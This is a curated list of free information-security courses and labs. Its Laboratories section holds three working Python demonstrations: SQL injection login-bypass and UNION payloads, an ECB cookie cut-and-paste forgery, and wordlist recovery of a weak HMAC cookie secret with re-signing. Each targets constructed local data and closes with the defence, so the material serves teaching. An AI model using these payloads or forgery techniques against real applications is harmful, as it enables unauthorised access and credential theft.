A curated list of awesome infosec courses and training resources.

Awesome Infosec

A curated list of awesome information security resources, inspired by the awesome-* trend on GitHub and my previous Coderwall publication.

The goal is to build a categorized community-driven collection of free resources focused on information security skill sets like:

  • Penetration Testing, Vulnerability Assessment
  • Computer Forensics, Malware Analysis, Reverse Engineering
  • Hardening, Honeypot Deployment, Network Security
  • Cryptography and Anonymity

Those resources and tools are intended only for cybersecurity professional and educational use in a controlled environment.

Table of Contents

  1. Massive Online Open Courses
  2. Academic Courses
  3. Laboratories
  4. Capture the Flag
  5. Open Security Books
  6. SecurityTube Playlists
  7. Related Awesome Lists
  8. Contributing
  9. License

Massive Online Open Courses

Stanford University - Computer Security

In this class you will learn how to design secure systems and write secure code. You will learn how to find vulnerabilities in code and how to design software systems that limit the impact of security vulnerabilities. We will focus on principles for building secure systems and give many real world examples.

Stanford University - Cryptography I

This course explains the inner workings of cryptographic primitives and how to correctly use them. Students will learn how to reason about the security of cryptographic constructions and how to apply this knowledge to real-world applications. The course begins with a detailed discussion of how two parties who have a shared secret key can communicate securely when a powerful adversary eavesdrops and tampers with traffic. We will examine many deployed protocols and analyze mistakes in existing systems. The second half of the course discusses public-key techniques that let two or more parties generate a shared secret key. We will cover the relevant number theory and discuss public-key encryption and basic key-exchange. Throughout the course students will be exposed to many exciting open problems in the field.

Stanford University - Cryptography II

This course is a continuation of Crypto I and explains the inner workings of public-key systems and cryptographic protocols. Students will learn how to reason about the security of cryptographic constructions and how to apply this knowledge to real-world applications. The course begins with constructions for digital signatures and their applications. We will then discuss protocols for user authentication and zero-knowledge protocols. Next we will turn to privacy applications of cryptography supporting anonymous credentials and private database lookup. We will conclude with more advanced topics including multi-party computation and elliptic curve cryptography.

University of Maryland - Usable Security

This course focuses on how to design and build secure systems with a human-centric focus. We will look at basic principles of human-computer interaction, and apply these insights to the design of secure systems with the goal of developing security measures that respect human performance and their goals within a system.

University of Maryland - Software Security

In this course we will explore the foundations of software security. We will consider important software vulnerabilities and attacks that exploit them -- such as buffer overflows, SQL injection, and session hijacking -- and we will consider defenses that prevent or mitigate these attacks, including advanced testing and program analysis techniques. Importantly, we take a "build security in" mentality, considering techniques at each phase of the development cycle that can be used to strengthen the security of software systems.

University of Maryland - Cryptography

This course will introduce you to the foundations of modern cryptography, with an eye toward practical applications. We will learn the importance of carefully defining security; of relying on a set of well-studied "hardness assumptions" (e.g., the hardness of factoring large numbers); and of the possibility of proving security of complicated constructions based on low-level primitives. We will not only cover these ideas in theory, but will also explore their real-world impact. You will learn about cryptographic primitives in wide use today, and see how these can be combined to develop modern protocols for secure communication.

University of Maryland - Hardware Security

Cybrary - Online Cyber Security Training

Cyber Security jobs are growing three times faster than information technology jobs. However, this rapidly growing and very exciting industry lacks the number of skilled professionals required to handle the jobs. Some common jobs within Cyber Security include information assurance, security analyst, penetration tester, malware analyst/reverse engineering and Intel. With these types of opportunities available, aspiring or growing Cyber Security professionals should focus on continually increasing their skill set, because the Cyber Security industry never rests, it is continually changing. However, traditionally, Cyber Security classes are the most expensive training classes. As you know, that barrier to entry has been removed.

  • CompTIA Security+
    In this class you will gain a stable foundation of Cyber Security and Information Assurance as well as prepare for the security industry's most sought-after entry-level certification.

  • Cryptography
    Learn how to secure data communications through the use of cryptographic messaging and practices.

  • Ethical Hacking and Penetration Testing
    Learn the fundamentals of hacking and penetration testing. Think like a hacker, so that you can stop them from intruding into your systems. This class will help prepare you for the industry's most sought-after certification, EC-Council's CEH.

  • Computer and Hacking Forensics
    In order to catch cyber criminals, you have to learn how to retrace their steps and correctly acquire and document the evidence. Also prepare for the industry leading CHFI certification from the EC-Council.

  • CompTIA Advanced Security Practitioner (CASP)
    This advanced certification covers deep topics that span across both Cyber Security as well as Information Assurance.

  • ISACA Certified Information Systems Auditor (CISA)
    Become an expert in information systems auditing and controlling with this leading auditor certification from ISACA.

  • Certified Information Systems Security Professional (CISSP)
    The leading certification for Information Assurance management personnel. This course is both very deep, and very broad. Be ready to study hard!

  • Post Exploitation
    Learn what to do to maintain your presence and to gather intelligence after you have exploited the target system.

  • Social Engineering and Manipulation
    Take a look inside the form, function and flow of a highly skilled social engineering cyber-attack. Learn to protect the human element.

  • Python for Security Professionals
    Learn the commands and functions that every aspiring cyber security professional must know from Python. This isn't a full programming course, but rather a course designed for non-coders who are developing their career in security.

  • Metasploit
    An in-depth look inside the Metasploit Framework intended to show you how to use it to its full potential.

  • Malware Analysis and Reverse Engineering
    An introduction to reverse engineering malware. This class is for experienced Cyber Security professionals, generally at least two to three years in the field is preferred.

  • Advanced Penetration Testing by Georgia Weidman
    This class is for advanced Cyber Security professionals. You will learn in depth, hands-on, advanced hacking techniques to help you target and penetrate almost any highly secured environment.

SANS Cyber Aces

SANS Cyber Aces Online makes available, free and online, selected courses from the professional development curriculum offered by The SANS Institute, the global leader in cyber security training. SANS's goal in making these courses available as open courseware is to help grow the talent pool and accelerate the rate at which skilled cyber professionals can enter the information security industry, filling mission-critical jobs currently going unfilled.

Open Security Training

  • Android Forensics & Security Testing
    This course will cover the most common issues facing mobile devices, and general tips for securing mobile applications. Upon completion of the general mobile security overview, the course will delve into proven practice in Mobile Device Forensics and Mobile Application Penetration Testing for Android devices. Over the two-day course, students will get hands-on time with open-source and commercial forensics tools, set up and explore reverse engineering development environments, and experience the process that professional mobile security engineers have successfully applied to several projects. Areas covered include identifying application vulnerabilities, code analysis, memory & file system analysis, and insecure storage of sensitive data.

  • Certified Information Systems Security Professional (CISSP)® Common Body of Knowledge (CBK)® Review
    The CISSP CBK Review course is uniquely designed for federal agency information assurance (IA) professionals in meeting NSTISSI-4011, National Training Standard for Information Systems Security Professionals, as required by DoD 8570.01-M, Information Assurance Workforce Improvement Program.

  • Flow Analysis & Network Hunting
    This course focuses on network analysis and hunting of malicious activity from a security operations center perspective. We will dive into the strengths of netflow, the operational limitations of netflow, recommended sensor placement, netflow tools, visualization of network data, analytic tradecraft for network situational awareness, and network hunting scenarios.

  • Hacking Techniques and Intrusion Detection
    This course covers the most common methods used in computer and network hacking with the intention of learning how to better protect systems from such intrusions. These methods include reconnaissance techniques, system scanning, accessing systems by network and application level attacks, and denial of service attacks. During the course students will complete many hands-on exercises.

  • Introductory Intel x86: Architecture, Assembly, Applications, & Alliteration
    Intel processors have been a major force in personal computing for more than 30 years. An understanding of low level computing mechanisms used in Intel chips as taught in this course serves as a foundation upon which to better understand other hardware, as well as many technical specialties such as reverse engineering, compiler design, operating system design, code optimization, and vulnerability exploitation.

  • Introductory Intel x86-64: Architecture, Assembly, Applications, & Alliteration
    Intel processors have been a major force in personal computing for more than 30 years. An understanding of low level computing mechanisms used in Intel chips as taught in this course serves as a foundation upon which to better understand other hardware, as well as many technical specialties such as reverse engineering, compiler design, operating system design, code optimization, and vulnerability exploitation.

  • Introduction to ARM
    ARM processors are becoming ubiquitous in mobile devices today with RISC processors making a comeback for their applications in low power computing environments. With major operating systems choosing to run on these processors including the latest Windows RT, iOS and Android, understanding the low level operations of these processors can serve to better understand, optimize and debug software stacks running on them. This class builds on the Intro to x86 class and tries to provide parallels and differences between the two processor architectures wherever possible while focusing on the ARM instruction set, some of the ARM processor features, and how software works and runs on the ARM processor.

  • Introduction to Cellular Security
    This course is intended to demonstrate the core concepts of cellular network security. Although the course discusses GSM, UMTS, and LTE - it is heavily focused on LTE. The course first introduces important cellular concepts and then follows the evolution of GSM to LTE.

  • Introduction to Network Forensics
    This is a mainly lecture based class giving an introduction to common network monitoring and forensic techniques. This class is meant to be accompanied by lab exercises to demonstrate certain tools and technologies, but the lab exercises are not absolutely necessary to convey the operating concepts.

  • Introduction to Secure Coding
    The purpose of this course is to provide developers with a short, focused primer related to secure coding. The hope is that each developer will leave the course with a better understanding of how they can improve, from a security perspective, the code that they write. This course provides a look at some of the most prevalent security related coding mistakes made in industry today. Each type of issue is explained in depth including how a malicious user may attack the code, and strategies for avoiding the issues are then reviewed. Knowledge of at least one programming language is required, although the specific programming language is not important as the concepts that will be discussed are language independent. The course will cover many of the weaknesses within the context of a web application, but most of the concepts will apply to all application development.

  • Introduction to Vulnerability Assessment
    This is a lecture and lab based class giving an introduction to vulnerability assessment of some common computing technologies. Instructor-led lab exercises are used to demonstrate specific tools and technologies.

  • Introduction to Trusted Computing
    This course is an introduction to the fundamental technologies behind Trusted Computing. You will learn what Trusted Platform Modules (TPMs) are and what capabilities they can provide both at an in-depth technical level and in an enterprise context. You will also learn about how other technologies such as the Dynamic Root of Trust for Measurement (DRTM) and virtualization can both take advantage of TPMs and be used to enhance the TPM's capabilities. We will cover major use cases for trusted computing, including machine authentication, data protection, and attestation. This course will also introduce you to the various software resources that exist today to support TPMs, give a high-level overview of related research and development projects, and briefly discuss other trusted computing standards such as Trusted Network Connect which may be relevant to enterprise deployment of TPMs and trusted computing.

  • Offensive, Defensive, and Forensic Techniques for Determining Web User Identity
    This course looks at web users from a few different perspectives. First, we look at identifying techniques to determine web user identities from a server perspective. Second, we look at obfuscating techniques from the perspective of a user who seeks to be anonymous. Finally, we look at forensic techniques which, given a hard drive or similar media, let us identify the users who accessed that server.

  • Pcap Analysis & Network Hunting
    Introduction to Packet Capture (PCAP) explains the fundamentals of how, where, and why to capture network traffic and what to do with it. This class covers open-source tools like tcpdump, Wireshark, and ChopShop in several lab exercises that reinforce the material. Some of the topics include capturing packets with tcpdump, mining DNS resolutions using only command-line tools, and busting obfuscated protocols. This class will prepare students to tackle common problems and help them begin developing the skills to handle more advanced networking challenges.

  • Malware Dynamic Analysis
    This introductory malware dynamic analysis class is dedicated to people who are starting to work on malware analysis or who want to know what kinds of artifacts left by malware can be detected via various tools. The class will be a hands-on class where students can use various tools to look for how malware is: Persisting, Communicating, and Hiding. We will achieve the items above by first learning the individual techniques sandboxes utilize. We will show how to capture and record registry, file, network, mutex, API, installation, hooking and other activity undertaken by the malware. We will create fake network responses to deceive malware so that it shows more behavior. We will also talk about how using MITRE's Malware Attribute Enumeration & Characterization (MAEC - pronounced "Mike") standard can help normalize the data obtained manually or from sandboxes, and improve junior malware analysts' reports. The class will additionally discuss how to take malware attributes and turn them into useful detection signatures such as Snort network IDS rules, or YARA signatures.

  • Secure Code Review
    This course is designed to help developers bring a secure coding mindset into typical project peer reviews. The course briefly talks about the development lifecycle and the importance of peer reviews in delivering a quality product. How to perform this review is discussed and how to keep secure coding a priority during the review is stressed. A variety of hands-on exercises will address common coding mistakes, what to focus on during a review, and how to manage limited time. Throughout the course, the class will break out into pairs and perform example peer reviews on sample code. Perl will be used for the hands-on exercises; however every attempt will be made to generalize the code such that anyone with an understanding of a coding language will be comfortable.

  • Smart Cards
    This course shows how smart cards are different compared to other types of cards. It is explained how smart cards can be used to realize confidentiality and integrity of information. Insight is given into the structure and operation of a smart card, the functionality of a smart card operating system and commonly used security mechanisms. In addition, an overview is given of developments in the field of chips (8, 16 and 32 bit architectures, co-processors), operating systems, virtual machines (Java Card, MULTOS), compatibility (PC/SC, Open Card, EMV), security evaluation (ITSEC, Common Criteria) and physical and logical attack methods (probing, SEM, FIB, DFA, DPA). Biometric identification and authentication using smart cards is dealt with, along with a summary of developments and (im)possibilities.

  • The Life of Binaries
    Along the way we discuss the relevance of security at different stages of a binary's life, from the tricks that can be played by a malicious compiler, to how viruses really work, to the way in which malware "packers" duplicate OS process execution functionality, to the benefit of a security-enhanced OS loader which implements address space layout randomization (ASLR).

  • Understanding Cryptology: Core Concepts
    This is an introduction to cryptology with a focus on applied cryptology. It was designed to be accessible to a wide audience, and therefore does not include a rigorous mathematical foundation (this will be covered in later classes).

  • Understanding Cryptology: Cryptanalysis
    A class for those who want to stop learning about building cryptographic systems and want to attack them. This course is a mixture of lectures designed to introduce students to a variety of code-breaking techniques and Python labs to solidify those concepts. Unlike its sister class, Core Concepts, math is necessary for this topic. Don't have a math degree? A basic understanding of algebra is sufficient; the mathematical principles that are necessary for understanding are included in the lecture. Knowledge of programming is also necessary, and knowledge of Python is very helpful.

  • Introduction to Software Exploits (Exploits 1)
    Software vulnerabilities are flaws in program logic that can be leveraged by an attacker to execute arbitrary code on a target system. This class will cover both the identification of software vulnerabilities and the techniques attackers use to exploit them. In addition, current techniques that attempt to remediate the threat of software vulnerability exploitation will be discussed.

  • Exploits 2: Exploitation in the Windows Environment
    This course covers the exploitation of stack corruption vulnerabilities in the Windows environment. Stack overflows are programming flaws that oftentimes allow an attacker to execute arbitrary code in the context of a vulnerable program. There are many nuances involved with exploiting these vulnerabilities in Windows. Windows exploit mitigations such as DEP, ASLR, SafeSEH, and SEHOP make leveraging these programming bugs more difficult, but not impossible. The course highlights the features and weaknesses of many of the exploit mitigation techniques deployed in Windows operating systems. Also covered are labs that describe the process of finding bugs in Windows applications with mutation-based fuzzing, and then developing exploits that target those bugs.

  • Intermediate Intel x86: Architecture, Assembly, Applications, & Alliteration
    Building upon the Introductory Intel x86 class, this class goes into more depth on topics already learned, and introduces more advanced topics that dive deeper into how Intel-based systems work. Example applications include showing how hardware and memory mechanisms are used for software exploits, anti-debug techniques, rootkit hiding, and direct hardware access for keystroke logging.

  • Advanced x86: Virtualization with Intel VT-x
    The purpose of this course is to provide a hands-on introduction to Intel hardware support for virtualization. The first part will motivate the challenges of virtualization in the absence of dedicated hardware. This is followed by a deep dive on the Intel virtualization "API" and labs to begin implementing a blue pill / hyperjacking attack made famous by researchers like Joanna Rutkowska and Dino Dai Zovi et al. Finally, virtualization detection techniques are discussed.

  • Introduction to Reverse Engineering Software
    Throughout the history of invention curious minds have sought to understand the inner workings of their gadgets. Whether investigating a broken watch, or improving an engine, these people have broken down their goods into their elemental parts to understand how they work. This is Reverse Engineering (RE), and it is done every day from recreating outdated and incompatible software, understanding malicious code, or exploiting weaknesses in software.

  • Reverse Engineering Malware
    This class picks up where the Introduction to Reverse Engineering Software course left off, exploring how static reverse engineering techniques can be used to understand what a piece of malware does and how it can be removed.

  • Rootkits: What they are, and how to find them
    Rootkits are a class of malware which are dedicated to hiding the attacker's presence on a compromised system. This class will focus on understanding how rootkits work, and what tools can be used to help find them. This will be a very hands-on class where we talk about specific techniques which rootkits use, and then do labs where we show how a proof of concept rootkit is able to hide things from a defender.

  • The Adventures of a Keystroke: An in-depth look into keylogging on Windows
    Windows is designed to be compatible with a lot of devices, which is why there are a lot of layers in the keystroke handling. The more layers a system has, the more probable it is that it could be compromised by bad guys. There are more than 30 methods for capturing keystrokes from a Windows PC. Methods vary from simple user mode techniques to advanced ones such as IRP hooking. The class currently covers most of the user mode and kernel mode techniques, including the undocumented ones which are not described anywhere else, but there are still techniques which are not covered in the class, such as Raw Input Devices. As for the hardware, we only cover PS/2 keyboards for the moment, but documenting USB keyboards is one of the planned topics for the near future.

Academic Courses

Florida State University - Offensive Computer Security

The primary incentive for an attacker to exploit a vulnerability, or series of vulnerabilities, is to achieve a return on an investment (his/her time, usually). This return need not be strictly monetary; an attacker may be interested in obtaining access to data, identities, or some other commodity that is valuable to them. The field of penetration testing involves authorized auditing and exploitation of systems to assess actual system security in order to protect against attackers. This requires thorough knowledge of vulnerabilities and how to exploit them. Thus, this course provides an introductory but comprehensive coverage of the fundamental methodologies, skills, legal issues, and tools used in white hat penetration testing and secure system administration.

Florida State University - Offensive Network Security

This class allows students to look deep into known protocols (i.e. IP, TCP, UDP) to see how an attacker can utilize these protocols to their advantage and how to spot issues in a network via captured network traffic. The first half of this course focuses on known protocols while the second half of the class focuses on reverse engineering unknown protocols. This class will utilize captured traffic to allow students to reverse the protocol by using known techniques such as incorporating bioinformatics, introduced by Marshall Beddoe. This class will also cover fuzzing protocols to see if the server or client has vulnerabilities. Overall, a student finishing this class will have a better understanding of the network layers, protocols, and network communication and their interaction in computer networks.

NYU Polytechnic School of Engineering - ISIS Lab's Hack Night

Developed from the materials of NYU Poly's old Penetration Testing and Vulnerability Analysis course, Hack Night is a sobering introduction to offensive security. A lot of complex technical content is covered very quickly as students are introduced to a wide variety of complex and immersive topics over thirteen weeks.

Rensselaer Polytechnic Institute - Modern Binary Exploitation

This course will start off by covering basic x86 reverse engineering, vulnerability analysis, and classical forms of Linux-based userland binary exploitation. It will then transition into protections found on modern systems (Canaries, DEP, ASLR, RELRO, Fortify Source, etc) and the techniques used to defeat them. Time permitting, the course will also cover other subjects in exploitation including kernel-land and Windows based exploitation.

Rensselaer Polytechnic Institute - Hardware Reverse Engineering

Reverse engineering techniques for semiconductor devices and their applications to competitive analysis, IP litigation, security testing, supply chain verification, and failure analysis. IC packaging technologies and sample preparation techniques for die recovery and live analysis. Deprocessing and staining methods for revealing features below top passivation. Memory technologies and appropriate extraction techniques for each. Study of contemporary anti-tamper/anti-RE methods and their effectiveness at protecting designs from attackers. Programmable logic microarchitecture and the issues involved with reverse engineering programmable logic.

City College of San Francisco - Sam Bowne Class

  • CNIT 120 - Network Security
    Knowledge and skills required for Network Administrators and Information Technology professionals to be aware of security vulnerabilities, to implement security measures, to analyze an existing network environment in consideration of known security threats or risks, to defend against attacks or viruses, and to ensure data privacy and integrity. Terminology and procedures for implementation and configuration of security, including access control, authorization, encryption, packet filters, firewalls, and Virtual Private Networks (VPNs).

  • CNIT 121 - Computer Forensics
    The class covers forensics tools, methods, and procedures used for investigation of computers, techniques of data recovery and evidence collection, protection of evidence, expert witness skills, and computer crime investigation techniques. Includes analysis of various file systems and specialized diagnostic software used to retrieve data. Prepares for part of the industry standard certification exam, Security+, and also maps to the Computer Investigation Specialists exam.

  • CNIT 123 - Ethical Hacking and Network Defense
    Students learn how hackers attack computers and networks, and how to protect systems from such attacks, using both Windows and Linux systems. Students will learn legal restrictions and ethical guidelines, and will be required to obey them. Students will perform many hands-on labs, both attacking and defending, using port scans, footprinting, exploiting Windows and Linux vulnerabilities, buffer overflow exploits, SQL injection, privilege escalation, Trojans, and backdoors.

  • CNIT 124 - Advanced Ethical Hacking
    Advanced techniques of defeating computer security, and countermeasures to protect Windows and Unix/Linux systems. Hands-on labs include Google hacking, automated footprinting, sophisticated ping and port scans, privilege escalation, attacks against telephone and Voice over Internet Protocol (VoIP) systems, routers, firewalls, wireless devices, Web servers, and Denial of Service attacks.

  • CNIT 126 - Practical Malware Analysis
    Learn how to analyze malware, including computer viruses, trojans, and rootkits, using disassemblers, debuggers, static and dynamic analysis, using IDA Pro, OllyDbg and other tools.

  • CNIT 127 - Exploit Development
    Learn how to find vulnerabilities and exploit them to gain control of target systems, including Linux, Windows, Mac, and Cisco. This class covers how to write tools, not just how to use them; essential skills for advanced penetration testers and software security professionals.

  • CNIT 128 - Hacking Mobile Devices
    Mobile devices such as smartphones and tablets are now used for making purchases, emails, social networking, and many other risky activities. These devices run specialized operating systems that have many security problems. This class will cover how mobile operating systems and apps work, how to find and exploit vulnerabilities in them, and how to defend them. Topics will include phone call, voicemail, and SMS intrusion, jailbreaking, rooting, NFC attacks, malware, browser exploitation, and application vulnerabilities. Hands-on projects will include as many of these activities as are practical and legal.

  • Violent Python and Exploit Development
    In the exploit development section, students will take over vulnerable systems with simple Python scripts.

Laboratories

Pentester Lab

There is only one way to properly learn web penetration testing: by getting your hands dirty. We teach how to manually find and exploit vulnerabilities. You will understand the root cause of the problems and the methods that can be used to exploit them. Our exercises are based on common vulnerabilities found in different systems. The issues are not emulated. We provide you real systems with real vulnerabilities.

  • From SQL Injection to Shell
    This exercise explains how you can, from a SQL injection, gain access to the administration console. Then in the administration console, how you can run commands on the system.

  • From SQL Injection to Shell: PostgreSQL edition
    This exercise explains how you can, from a SQL injection, gain access to the administration console. Then in the administration console, how you can run commands on the system.

  • From SQL Injection to Shell II
    This exercise explains how you can, from a blind SQL injection, gain access to the administration console. Then in the administration console, how you can run commands on the system.

  • Web for Pentester
    This exercise is a set of the most common web vulnerabilities.

  • Web for Pentester II
    This exercise is a set of the most common web vulnerabilities.

  • PHP Include And Post Exploitation
    This exercise describes the exploitation of a local file include with limited access. Once code execution is gained, you will see some post-exploitation tricks.

  • Linux Host Review
    This exercise explains how to perform a Linux host review: what you can check in the configuration of a Linux server, and how, to ensure it is securely configured. The reviewed system is a traditional Linux-Apache-MySQL-PHP (LAMP) server used to host a blog.

  • Electronic Code Book
    This exercise explains how you can tamper with an encrypted cookie to access another user's account.

  • Rack Cookies and Commands injection
    After a short brute-force introduction, this exercise explains the tampering of a Rack cookie and how you can even manage to modify a signed cookie (if the secret is trivial). Using this issue, you will be able to escalate your privileges and gain command execution.

  • XSS and MySQL FILE
    This exercise explains how you can use a Cross-Site Scripting vulnerability to get access to an administrator's cookies. Then how you can use his/her session to gain access to the administration interface, find a SQL injection, and gain code execution using it.

  • Axis2 Web service and Tomcat Manager
    This exercise explains the interactions between Tomcat and Apache, then it will show you how to call and attack an Axis2 Web service. Using information retrieved from this attack, you will be able to gain access to the Tomcat Manager and deploy a WebShell to gain command execution.

  • Play Session Injection
    This exercise covers the exploitation of a session injection in the Play framework. This issue can be used to tamper with the content of the session while bypassing the signing mechanism.

  • Play XML Entities
    This exercise covers the exploitation of XML entities (XXE) in the Play framework.

  • CVE-2007-1860: mod_jk double-decoding
    This exercise covers the exploitation of CVE-2007-1860. This vulnerability allows an attacker to gain access to otherwise inaccessible pages using crafted requests. This is a common trick that a lot of testers miss.

  • CVE-2008-1930: WordPress 2.5 Cookie Integrity Protection Vulnerability
    This exercise explains how you can exploit CVE-2008-1930 to gain access to the administration interface of a WordPress installation.

  • CVE-2012-1823: PHP CGI
    This exercise explains how you can exploit CVE-2012-1823 to retrieve the source code of an application and gain code execution.

  • CVE-2012-2661: ActiveRecord SQL injection
    This exercise explains how you can exploit CVE-2012-2661 to retrieve information from a database.

  • CVE-2012-6081: MoinMoin code execution
    This exercise explains how you can exploit CVE-2012-6081 to gain code execution. This vulnerability was exploited to compromise Debian's wiki and Python documentation website.

  • CVE-2014-6271/Shellshock
    This exercise covers the exploitation of a Bash vulnerability through a CGI.
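The three "From SQL Injection to Shell" exercises above start the same way: an injection in a login or lookup query is turned first into an authentication bypass and then into a way to read other rows (such as the administrator's credentials) out of the database. The following is an added example written for this page, not PentesterLab's code: it uses an in-memory SQLite table with constructed accounts in place of the labs' MySQL/PostgreSQL back ends, and shows the same query built by string formatting and with bound parameters. The payloads and table layout are assumptions for the demo.

```python
import sqlite3

# Constructed sample accounts for the demo; not data from any real system.
USERS = [
    ("admin", "c0rrect-horse-battery", "admin"),
    ("alice", "alice-pass", "user"),
]

# Attacker-supplied username values (the password field is arbitrary).
# "--" starts a SQL comment, so everything after it, including the
# password check, is ignored by the database.
BYPASS_USERNAME = "admin' -- "
# A UNION moves the admin password into the column the app echoes back.
UNION_USERNAME = ("' UNION SELECT password, role FROM users "
                  "WHERE username = 'admin' -- ")


def build_db():
    """In-memory SQLite database standing in for the lab's MySQL/PostgreSQL."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT, role TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?, ?)", USERS)
    return conn


def login_vulnerable(conn, username, password):
    """Builds the query by string formatting, so user input becomes SQL."""
    sql = ("SELECT username, role FROM users "
           "WHERE username = '%s' AND password = '%s'" % (username, password))
    return conn.execute(sql).fetchone()   # (username, role) or None


def login_hardened(conn, username, password):
    """Same query with bound parameters: input is always data, never SQL."""
    sql = ("SELECT username, role FROM users "
           "WHERE username = ? AND password = ?")
    return conn.execute(sql, (username, password)).fetchone()


def demo():
    """Runs both versions against the same payloads and returns the rows."""
    conn = build_db()
    return {
        "normal": login_vulnerable(conn, "alice", "alice-pass"),
        "bypass": login_vulnerable(conn, BYPASS_USERNAME, "anything"),
        "leak": login_vulnerable(conn, UNION_USERNAME, "anything"),
        "hardened_bypass": login_hardened(conn, BYPASS_USERNAME, "anything"),
        "hardened_leak": login_hardened(conn, UNION_USERNAME, "anything"),
    }


if __name__ == "__main__":
    for name, row in demo().items():
        print(f"{name:16} -> {row}")
```

The "leak" case is the step that matters for the lab: once a column the application displays can be filled from an arbitrary SELECT, the admin credentials (or, in the blind variant, one bit at a time) come out through the page itself. The parameterized version returns None for both payloads because the quote and comment characters never reach the SQL parser as syntax.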
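The "Electronic Code Book" exercise above relies on one property of ECB mode: every 16-byte block is encrypted independently with the same key, so a block cut from one ciphertext can be pasted into another and will decrypt to the same plaintext there. The block below is an added example, not the lab's code. It stands in a toy block cipher for AES (it is a fixed bijection on 16-byte blocks, which is all the attack needs), assumes a cookie layout of `user=<name>;role=user` with PKCS#7 padding, and assumes the application accepts the padding bytes inside a username; the key, names and layout are constructed for the demo.

```python
import random

BLOCK = 16
# Constructed server key; the attacker never learns it.
KEY = b"server-side-key!"   # 16 bytes

# --- toy block cipher, stand-in for AES-ECB ----------------------------------
# A keyed byte substitution after XOR with the key.  Cryptographically weak,
# but it is a fixed bijection on 16-byte blocks applied to each block on its
# own, which is the only ECB property the cut-and-paste attack relies on.
_SBOX = list(range(256))
random.Random(KEY).shuffle(_SBOX)
_INV_SBOX = [0] * 256
for _i, _v in enumerate(_SBOX):
    _INV_SBOX[_v] = _i


def _enc_block(block):
    return bytes(_SBOX[b ^ k] for b, k in zip(block, KEY))


def _dec_block(block):
    return bytes(_INV_SBOX[b] ^ k for b, k in zip(block, KEY))


def pad(data):
    """PKCS#7 padding to a multiple of BLOCK."""
    n = BLOCK - len(data) % BLOCK
    return data + bytes([n]) * n


def unpad(data):
    n = data[-1] if data else 0
    if not 1 <= n <= BLOCK or data[-n:] != bytes([n]) * n:
        raise ValueError("bad padding")
    return data[:-n]


def ecb_encrypt(plaintext):
    pt = pad(plaintext)
    return b"".join(_enc_block(pt[i:i + BLOCK]) for i in range(0, len(pt), BLOCK))


def ecb_decrypt(ciphertext):
    if not ciphertext or len(ciphertext) % BLOCK:
        raise ValueError("ciphertext length is not a multiple of the block size")
    pt = b"".join(_dec_block(ciphertext[i:i + BLOCK])
                  for i in range(0, len(ciphertext), BLOCK))
    return unpad(pt)


# --- the application ---------------------------------------------------------
def issue_cookie(username):
    """Server side: serialise the session and encrypt it.  The attacker
    chooses `username` at registration; everything else is fixed."""
    return ecb_encrypt(b"user=" + username + b";role=user")


def read_cookie(cookie):
    """Server side: decrypt and parse.  Nothing checks integrity."""
    fields = ecb_decrypt(cookie).split(b";")
    return dict(f.split(b"=", 1) for f in fields)


# --- the attacker, using only issue_cookie() as an oracle --------------------
def forge_admin_cookie():
    # Step 1: a 5-byte username makes "user=bob12;role=" exactly one block,
    # so the second block holds nothing but the role value and its padding.
    target = issue_cookie(b"bob12")
    # Step 2: a username whose tail is pad(b"admin") places that exact
    # padded block at block position 1 of another cookie.
    crafted = issue_cookie(b"a" * 11 + pad(b"admin"))
    admin_block = crafted[BLOCK:2 * BLOCK]
    # Step 3: cut-and-paste.  Same key, independent blocks, valid padding.
    return target[:BLOCK] + admin_block


if __name__ == "__main__":
    print(read_cookie(issue_cookie(b"bob12")))
    print(read_cookie(forge_admin_cookie()))
```

Swapping the toy cipher for real AES changes nothing about the attack; what stops it is an integrity check, either an authenticated mode such as AES-GCM or a MAC over the ciphertext verified before decryption.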
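The "Rack Cookies and Commands injection" exercise above turns on the signed-cookie case: a MAC over a payload the attacker can read is an offline oracle for the secret, so a trivial secret can be recovered from a wordlist and then used to sign a modified session. This is an added example written for this page, not the lab's or Rack's code. It keeps Rack's cookie layout (base64 payload, `--`, hex HMAC-SHA1) but serialises the session as JSON rather than a Ruby Marshal dump; the secret, wordlist and session contents are constructed for the demo.

```python
import base64
import hashlib
import hmac
import json

# Constructed values for the demo.  A real Rack cookie holds a Marshal dump
# rather than JSON; the signing layout (payload, "--", hex HMAC-SHA1) is the
# part that matters here.
SERVER_SECRET = b"secret"
WORDLIST = [b"password", b"admin", b"123456", b"secret", b"changeme"]


def sign_cookie(session, secret):
    """Server side: base64(payload) + "--" + HMAC-SHA1(secret, payload)."""
    payload = base64.b64encode(json.dumps(session, sort_keys=True).encode()).decode()
    mac = hmac.new(secret, payload.encode(), hashlib.sha1).hexdigest()
    return payload + "--" + mac


def verify_cookie(cookie, secret):
    """Server side: returns the session dict, or None if the MAC is wrong."""
    payload, sep, mac = cookie.rpartition("--")
    if not sep:
        return None
    expected = hmac.new(secret, payload.encode(), hashlib.sha1).hexdigest()
    if not hmac.compare_digest(mac, expected):
        return None
    return json.loads(base64.b64decode(payload))


def recover_secret(cookie, candidates):
    """Attacker: the MAC over a known payload is an offline oracle for the
    secret, so a weak secret falls to a wordlist in one pass."""
    payload, _, mac = cookie.rpartition("--")
    for cand in candidates:
        guess = hmac.new(cand, payload.encode(), hashlib.sha1).hexdigest()
        if hmac.compare_digest(guess, mac):
            return cand
    return None


def forge_cookie(cookie, candidates, **changes):
    """Attacker: recover the secret, edit the session, re-sign it."""
    secret = recover_secret(cookie, candidates)
    if secret is None:
        return None
    session = verify_cookie(cookie, secret)
    session.update(changes)
    return sign_cookie(session, secret)


# A cookie as the server would hand it to a logged-in, non-admin user.
ISSUED_COOKIE = sign_cookie({"user": "alice", "admin": False}, SERVER_SECRET)


if __name__ == "__main__":
    print("recovered secret:", recover_secret(ISSUED_COOKIE, WORDLIST))
    forged = forge_cookie(ISSUED_COOKIE, WORDLIST, admin=True)
    print("server sees:", verify_cookie(forged, SERVER_SECRET))
```

The MAC construction itself is fine; the weakness is entirely in the secret. A long random secret makes `recover_secret` hopeless, which is why the lab stresses "if the secret is trivial". Note also that in the real exercise the deserialised object is a Marshal dump, so a recovered secret buys more than a flipped flag.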

Syracuse University's SEED

Developing Instructional Laboratories for Computer SEcurity EDucation

